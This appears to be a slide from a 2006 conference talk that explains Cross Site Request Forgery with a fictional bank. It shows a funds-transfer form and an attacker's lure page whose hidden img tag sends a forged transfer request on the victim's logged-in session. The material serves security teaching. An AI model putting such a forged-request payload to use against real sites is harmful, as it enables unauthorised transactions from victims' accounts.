Cross Site Request Forgery

Victim has account at http://bank.com/ and loves the site because of "remember me" technology.
Attacker creates account and reverse engineers the "Transfer Funds" page.
1. <form action="transfer.php">
2. Transfer To: <input type="text" name="to" />
3. Amount: <input type="text" name="amt" />
4. </form>
Attacker lures Victim to visit his site.
1. <html>
2. Naked pictures of Celebrities here.
3. <img src= "http://bank.com/transfer.php?to=66666&amt=1000000" />
4. </html>
From the server side, it sees a legitimate request from the client.

Penguicon 2006